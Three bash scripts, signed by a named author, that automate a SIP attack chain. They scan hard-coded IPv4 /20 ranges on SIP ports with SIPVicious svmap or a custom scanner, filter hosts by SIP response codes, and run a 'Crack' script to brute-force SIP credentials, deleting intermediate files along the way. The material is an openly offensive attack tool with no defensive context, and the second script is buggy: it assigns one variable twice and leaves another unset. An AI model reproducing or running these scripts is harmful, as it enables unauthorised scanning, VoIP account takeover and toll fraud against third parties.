برمجة جديدة

#!/bin/bash

# Scan IPv4 range on port sip

echo -e "\nStart scanning ...\n"

VAR1=188.165.50.0/20
VAR2=212.83.170.0/20
VAR3=5.135.186.0/20
VAR4=54.36.20.0/20
VAR5=217.182.71.0/20

     echo ----------------$VAR1----------------
docker run -i russmckendrick/sipvicious svmap.py -p5060-5099 $VAR1 -t0.0 -v >> result.txt

     echo ----------------$VAR2----------------
docker run -i russmckendrick/sipvicious svmap.py -p5060-5099 $VAR2 -t0.0 -v >> result.txt

     echo ----------------$VAR3----------------
docker run -i russmckendrick/sipvicious svmap.py -p5060-5099 $VAR3 -t0.0 -v >> result.txt

     echo ----------------$VAR4----------------
docker run -i russmckendrick/sipvicious svmap.py -p5060-5099 $VAR4 -t0.0 -v >> result.txt

     echo ----------------$VAR5----------------
docker run -i russmckendrick/sipvicious svmap.py -p5060-5099 $VAR5 -t0.0 -v >> result.txt


echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
sleep 20

echo -e "\nEnding scanning port !\n"

# SIP Responses

echo -e "\nStart SIP Responses ...\n"

grep -Po "(\d+\.){3}\d+:?(\d?){6}" result.txt >>IPS
perl run IPS
cat 401.pal 400.pal 403.pal 404.pal >> ipSIP
rm IPS # remove the file IPS
rm result.txt # remove the file
sleep 5

echo -e "\nEnding Responses !\n"

# SIP Crack

echo -e "\nStart SIP Crack ...\n"

perl Crack 250 2 ipSIP
rm ipSIP # remove the file ipSIP
rm *.pal # remove the file

sleep 5

echo -e "\nEnding crack !\n"
echo -e "\nby Mohammad Elnwajha\n"




===================================================================================
#!/bin/bash

# Scan IPv4 range on ports
echo -e "\nStart scanning ...\n"

# Veriables for Svm

VAR1=204
VAR2=205
VAR3=5
VAR3=69

./ss 5060 -a $VAR1 -s 10
sed '/:[0-9]*$/ ! s/$/:5060/' bios.txt >>VAR1.txt
rm bios.txt # remove the bios file
./ss 5060 -a $VAR2 -s 10
sed '/:[0-9]*$/ ! s/$/:5060/' bios.txt >>VAR2.txt
rm bios.txt # remove the bios file
./ss 5060 -a $VAR3 -s 10
sed '/:[0-9]*$/ ! s/$/:5060/' bios.txt >>VAR3.txt
rm bios.txt # remove the bios file
./ss 5060 -a $VAR4 -s 10
sed '/:[0-9]*$/ ! s/$/:5060/' bios.txt >>VAR4.txt
rm bios.txt # remove the bios file
sleep 1
cat VAR1.txt VAR2.txt VAR3.txt VAR4.txt >> IPSx
grep -Po "(\d+\.){3}\d+:?(\d?){6}" IPSx >>IPS
rm VAR1.txt # remove the file
rm VAR2.txt # remove the file
rm VAR3.txt # remove the file
rm VAR4.txt # remove the file
rm IPSx # remove the file
sleep 1

echo -e "\nEnding scanning port !\n"

# SIP Responses

echo -e "\nStart SIP Responses ...\n"

perl run IPS
cat 403.pal 404.pal >> ipSIP
rm IPS # remove the file IPS
sleep 2

echo -e "\nEnding Responses !\n"

# SIP Crack

echo -e "\nStart SIP Crack ...\n"

perl Crack 250 2 ipSIP
rm ipSIP # remove the file ipSIP
rm *.pal # remove the file

sleep 2

echo -e "\nEnding crack !\n"
echo -e "\nby Mohammad Elnwajha\n"


================================================== NEW NEW =========================================

#!/bin/bash

# Scan IPv4 range on ports
echo -e "\nStart scanning ...\n"

bash go
sleep 1
grep -Po "(\d+\.){3}\d+:?(\d?){6}" IPSx >>IPS
sleep 5

echo -e "\nEnding scanning port !\n"

# SIP Responses

echo -e "\nStart SIP Responses ...\n"

perl run IPS
cat 401.pal 400.pal 403.pal 404.pal >> ipSIP
rm IPS # remove the file IPS
rm IPSx # remove the file
sleep 2

echo -e "\nEnding Responses !\n"

# SIP Crack

echo -e "\nStart SIP Crack ...\n"

perl Crack 5000 2 ipSIP
rm ipSIP # remove the file ipSIP
rm *.pal # remove the file

sleep 2

echo -e "\nEnding crack !\n"
echo -e "\nby Mohammad Elnwajha\n"
